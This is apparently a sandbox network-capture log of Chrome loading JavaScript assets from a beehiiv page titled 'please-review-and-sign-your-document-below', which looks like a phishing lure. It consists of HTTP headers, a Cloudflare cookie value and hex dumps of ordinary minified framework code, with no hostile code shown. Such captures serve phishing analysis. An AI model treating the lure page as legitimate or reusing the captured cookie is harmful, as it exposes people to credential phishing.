                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:37 UTC905INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:37 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 1900
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960860&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=FTFAbhRSm%2BLvyAx2y4n1YtRtinTGussYyR%2B2UCmOtto%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960860&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=FTFAbhRSm%2BLvyAx2y4n1YtRtinTGussYyR%2B2UCmOtto%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"76c-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8b51b8f5e6d-EWR
                                                                                                                                            2025-01-15 18:14:37 UTC464INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 39 65 35 61 64 32 64 30 2d 30 34 63 66 2d 35 34 35 36 2d 61 39 38 39 2d 66 35 62 64 64 37 38 64 63 39 31 31 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="9e5ad2d0-04cf-5456-a989-f5bdd78dc911")}catch(
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 2c 66 69 6c 6c 3a 22 6e 6f 6e 65 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 72 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 33 30 20 33 30 22 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 6a 73 78 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 23 30 42 30 44 32 41 22 2c 64 3a 22 4d 32 35 2e 36 39 32 20 31 33 2e 31 36 38 48 33 2e 38 36 36 63 2d 2e 35 35 36 20 30 2d 31 2e 30 31 2d 2e 34 35 38 2d 31 2e 30 31 2d 31 2e 30 31 37 56 31 30 2e 36 63 30 2d 31 2e 37 35 35 20 31 2e 34 31 34 2d 33 2e 31 37 38 20 33 2e 31 35 37 2d 33 2e 31 37 38 48 32 33 2e 35 32 63 31 2e 37 34 33 20 30 20 33 2e 31 35 37 20 31 2e 34 32 33 20 33 2e 31 35 37 20 33 2e 31 37 37 76 31 2e 35 35 61 2e 39 38 2e 39 38 20 30 20 30 20 31 2d 2e 39 38 35 20 31 2e 30 31 38 5a 4d 32 31 2e 30 39 32 20 35 2e 37 34 35 48 38
                                                                                                                                            Data Ascii: ,fill:"none",className:r,viewBox:"0 0 30 30",children:e.jsx("path",{fill:"#0B0D2A",d:"M25.692 13.168H3.866c-.556 0-1.01-.458-1.01-1.017V10.6c0-1.755 1.414-3.178 3.157-3.178H23.52c1.743 0 3.157 1.423 3.157 3.177v1.55a.98.98 0 0 1-.985 1.018ZM21.092 5.745H8
                                                                                                                                            2025-01-15 18:14:37 UTC67INData Raw: 2d 42 6d 4c 43 6a 37 33 4a 2e 6a 73 2e 6d 61 70 0a 0a 2f 2f 23 20 64 65 62 75 67 49 64 3d 39 65 35 61 64 32 64 30 2d 30 34 63 66 2d 35 34 35 36 2d 61 39 38 39 2d 66 35 62 64 64 37 38 64 63 39 31 31 0a
                                                                                                                                            Data Ascii: -BmLCj73J.js.map//# debugId=9e5ad2d0-04cf-5456-a989-f5bdd78dc911


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            99192.168.2.1649825104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:37 UTC844OUTGET /assets/XMarkIcon-Y2tO3Ykg.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:37 UTC911INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:37 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 837
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"345-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4164
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8b58c5580d3-EWR
                                                                                                                                            2025-01-15 18:14:37 UTC458INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 30 37 63 35 31 37 64 31 2d 39 62 66 65 2d 35 66 32 31 2d 38 38 33 39 2d 32 32 36 61 62 32 36 33 61 33 38 39 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="07c517d1-9bfe-5f21-8839-226ab263a389")}catch(
                                                                                                                                            2025-01-15 18:14:37 UTC379INData Raw: 6b 65 57 69 64 74 68 3a 31 2e 35 2c 73 74 72 6f 6b 65 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 22 74 72 75 65 22 2c 22 64 61 74 61 2d 73 6c 6f 74 22 3a 22 69 63 6f 6e 22 2c 72 65 66 3a 6e 2c 22 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 22 3a 74 7d 2c 6f 29 2c 72 3f 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 74 69 74 6c 65 22 2c 7b 69 64 3a 74 7d 2c 72 29 3a 6e 75 6c 6c 2c 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 73 74 72 6f 6b 65 4c 69 6e 65 63 61 70 3a 22 72 6f 75 6e 64 22 2c 73 74 72 6f 6b 65 4c 69 6e 65 6a 6f 69 6e 3a 22 72 6f 75 6e 64 22 2c 64 3a 22 4d 36 20 31 38 20 31 38 20 36 4d 36 20 36 6c 31 32 20 31 32 22 7d 29 29 7d 63 6f 6e 73 74 20 69 3d 65 2e 66 6f 72
                                                                                                                                            Data Ascii: keWidth:1.5,stroke:"currentColor","aria-hidden":"true","data-slot":"icon",ref:n,"aria-labelledby":t},o),r?e.createElement("title",{id:t},r):null,e.createElement("path",{strokeLinecap:"round",strokeLinejoin:"round",d:"M6 18 18 6M6 6l12 12"}))}const i=e.for


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            100192.168.2.1649827104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:37 UTC840OUTGET /assets/index-pnFxOaac.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:37 UTC911INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:37 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 868
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"364-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4164
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8b5e86a431f-EWR
                                                                                                                                            2025-01-15 18:14:37 UTC458INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 35 37 30 37 36 36 30 63 2d 31 37 65 32 2d 35 64 63 64 2d 38 62 64 61 2d 35 35 33 63 38 32 34 65 66 30 34 62 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="5707660c-17e2-5dcd-8bda-553c824ef04b")}catch(
                                                                                                                                            2025-01-15 18:14:37 UTC410INData Raw: 3d 3d 3d 22 72 65 77 61 72 64 22 3f 22 62 6f 72 64 65 72 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 32 30 30 20 72 65 6c 61 74 69 76 65 20 6f 76 65 72 66 6c 6f 77 2d 68 69 64 64 65 6e 20 72 6f 75 6e 64 65 64 2d 66 75 6c 6c 20 77 2d 66 75 6c 6c 20 68 2d 34 22 3a 22 72 65 6c 61 74 69 76 65 20 6f 76 65 72 66 6c 6f 77 2d 68 69 64 64 65 6e 20 68 2d 31 2e 35 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 77 2d 66 75 6c 6c 22 3b 72 65 74 75 72 6e 20 65 2e 6a 73 78 28 6c 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 73 2c 76 61 6c 75 65 3a 72 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 6a 73 78 28 6f 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 74 28 22 68 2d 66 75 6c 6c 20 77 2d 66 75 6c 6c 20 62 67 2d 77 74 2d 70 72 69 6d 61 72 79 22 2c 61 3d 3d 3d 22 73 69 67 6e 75 70 2d 66 6c 6f 77 22 26
                                                                                                                                            Data Ascii: ==="reward"?"border border-gray-200 relative overflow-hidden rounded-full w-full h-4":"relative overflow-hidden h-1.5 bg-transparent w-full";return e.jsx(l,{className:s,value:r,children:e.jsx(o,{className:t("h-full w-full bg-wt-primary",a==="signup-flow"&


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            101192.168.2.1649828104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:37 UTC840OUTGET /assets/index-IxBbnf-Q.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:37 UTC916INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:37 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 169070
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"2946e-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4164
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8b5ee347d02-EWR
                                                                                                                                            2025-01-15 18:14:37 UTC453INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 65 62 61 30 35 65 66 62 2d 33 63 37 34 2d 35 65 36 36 2d 39 62 39 63 2d 35 32 39 65 61 38 62 38 38 39 37 30 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="eba05efb-3c74-5e66-9b9c-529ea8b88970")}catch(
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 2c 22 2b 28 6e 2e 70 61 64 4c 65 66 74 3d 3d 3d 21 31 3f 22 22 3a 22 20 22 29 29 2e 74 72 69 6d 28 29 7d 63 6f 6e 73 74 20 56 69 3d 2f 5e 5b 24 5f 5c 70 7b 49 44 5f 53 74 61 72 74 7d 5d 5b 24 5f 5c 75 7b 32 30 30 43 7d 5c 75 7b 32 30 30 44 7d 5c 70 7b 49 44 5f 43 6f 6e 74 69 6e 75 65 7d 5d 2a 24 2f 75 2c 57 69 3d 2f 5e 5b 24 5f 5c 70 7b 49 44 5f 53 74 61 72 74 7d 5d 5b 2d 24 5f 5c 75 7b 32 30 30 43 7d 5c 75 7b 32 30 30 44 7d 5c 70 7b 49 44 5f 43 6f 6e 74 69 6e 75 65 7d 5d 2a 24 2f 75 2c 51 69 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6d 74 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 51 69 2e 6a 73 78 3f 57 69 3a 56 69 29 2e 74 65 73 74 28 65 29 7d 63 6f 6e 73 74 20 59 69 3d 2f 5b 20 5c 74 5c 6e 5c 66 5c 72 5d 2f 67 3b 66 75 6e 63 74 69 6f 6e 20 58 69 28 65 29 7b
                                                                                                                                            Data Ascii: ,"+(n.padLeft===!1?"":" ")).trim()}const Vi=/^[$_\p{ID_Start}][$_\u{200C}\u{200D}\p{ID_Continue}]*$/u,Wi=/^[$_\p{ID_Start}][-$_\u{200C}\u{200D}\p{ID_Continue}]*$/u,Qi={};function mt(e,t){return(Qi.jsx?Wi:Vi).test(e)}const Yi=/[ \t\n\f\r]/g;function Xi(e){
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 73 20 57 6e 20 65 78 74 65 6e 64 73 20 72 65 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 74 2c 6e 2c 72 2c 69 29 7b 6c 65 74 20 6c 3d 2d 31 3b 69 66 28 73 75 70 65 72 28 74 2c 6e 29 2c 64 74 28 74 68 69 73 2c 22 73 70 61 63 65 22 2c 69 29 2c 74 79 70 65 6f 66 20 72 3d 3d 22 6e 75 6d 62 65 72 22 29 66 6f 72 28 3b 2b 2b 6c 3c 6b 6e 2e 6c 65 6e 67 74 68 3b 29 7b 63 6f 6e 73 74 20 6f 3d 6b 6e 5b 6c 5d 3b 64 74 28 74 68 69 73 2c 6b 6e 5b 6c 5d 2c 28 72 26 76 6e 5b 6f 5d 29 3d 3d 3d 76 6e 5b 6f 5d 29 7d 7d 7d 57 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 66 69 6e 65 64 3d 21 30 3b 66 75 6e 63 74 69 6f 6e 20 64 74 28 65 2c 74 2c 6e 29 7b 6e 26 26 28 65 5b 74 5d 3d 6e 29 7d 63 6f 6e 73 74 20 4b 69 3d 7b 7d 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 3b 66 75 6e 63 74
                                                                                                                                            Data Ascii: s Wn extends re{constructor(t,n,r,i){let l=-1;if(super(t,n),dt(this,"space",i),typeof r=="number")for(;++l<kn.length;){const o=kn[l];dt(this,kn[l],(r&vn[o])===vn[o])}}}Wn.prototype.defined=!0;function dt(e,t,n){n&&(e[t]=n)}const Ki={}.hasOwnProperty;funct
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 65 74 61 69 6c 73 3a 6e 75 6c 6c 2c 61 72 69 61 44 69 73 61 62 6c 65 64 3a 56 2c 61 72 69 61 44 72 6f 70 45 66 66 65 63 74 3a 48 2c 61 72 69 61 45 72 72 6f 72 4d 65 73 73 61 67 65 3a 6e 75 6c 6c 2c 61 72 69 61 45 78 70 61 6e 64 65 64 3a 56 2c 61 72 69 61 46 6c 6f 77 54 6f 3a 48 2c 61 72 69 61 47 72 61 62 62 65 64 3a 56 2c 61 72 69 61 48 61 73 50 6f 70 75 70 3a 6e 75 6c 6c 2c 61 72 69 61 48 69 64 64 65 6e 3a 56 2c 61 72 69 61 49 6e 76 61 6c 69 64 3a 6e 75 6c 6c 2c 61 72 69 61 4b 65 79 53 68 6f 72 74 63 75 74 73 3a 6e 75 6c 6c 2c 61 72 69 61 4c 61 62 65 6c 3a 6e 75 6c 6c 2c 61 72 69 61 4c 61 62 65 6c 6c 65 64 42 79 3a 48 2c 61 72 69 61 4c 65 76 65 6c 3a 43 2c 61 72 69 61 4c 69 76 65 3a 6e 75 6c 6c 2c 61 72 69 61 4d 6f 64 61 6c 3a 56 2c 61 72 69 61 4d 75 6c
                                                                                                                                            Data Ascii: etails:null,ariaDisabled:V,ariaDropEffect:H,ariaErrorMessage:null,ariaExpanded:V,ariaFlowTo:H,ariaGrabbed:V,ariaHasPopup:null,ariaHidden:V,ariaInvalid:null,ariaKeyShortcuts:null,ariaLabel:null,ariaLabelledBy:H,ariaLevel:C,ariaLive:null,ariaModal:V,ariaMul
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 74 69 6f 6e 3a 6e 75 6c 6c 2c 66 6f 72 6d 45 6e 63 54 79 70 65 3a 6e 75 6c 6c 2c 66 6f 72 6d 4d 65 74 68 6f 64 3a 6e 75 6c 6c 2c 66 6f 72 6d 4e 6f 56 61 6c 69 64 61 74 65 3a 4d 2c 66 6f 72 6d 54 61 72 67 65 74 3a 6e 75 6c 6c 2c 68 65 61 64 65 72 73 3a 48 2c 68 65 69 67 68 74 3a 43 2c 68 69 64 64 65 6e 3a 4d 2c 68 69 67 68 3a 43 2c 68 72 65 66 3a 6e 75 6c 6c 2c 68 72 65 66 4c 61 6e 67 3a 6e 75 6c 6c 2c 68 74 6d 6c 46 6f 72 3a 48 2c 68 74 74 70 45 71 75 69 76 3a 48 2c 69 64 3a 6e 75 6c 6c 2c 69 6d 61 67 65 53 69 7a 65 73 3a 6e 75 6c 6c 2c 69 6d 61 67 65 53 72 63 53 65 74 3a 6e 75 6c 6c 2c 69 6e 65 72 74 3a 4d 2c 69 6e 70 75 74 4d 6f 64 65 3a 6e 75 6c 6c 2c 69 6e 74 65 67 72 69 74 79 3a 6e 75 6c 6c 2c 69 73 3a 6e 75 6c 6c 2c 69 73 4d 61 70 3a 4d 2c 69 74 65
                                                                                                                                            Data Ascii: tion:null,formEncType:null,formMethod:null,formNoValidate:M,formTarget:null,headers:H,height:C,hidden:M,high:C,href:null,hrefLang:null,htmlFor:H,httpEquiv:H,id:null,imageSizes:null,imageSrcSet:null,inert:M,inputMode:null,integrity:null,is:null,isMap:M,ite
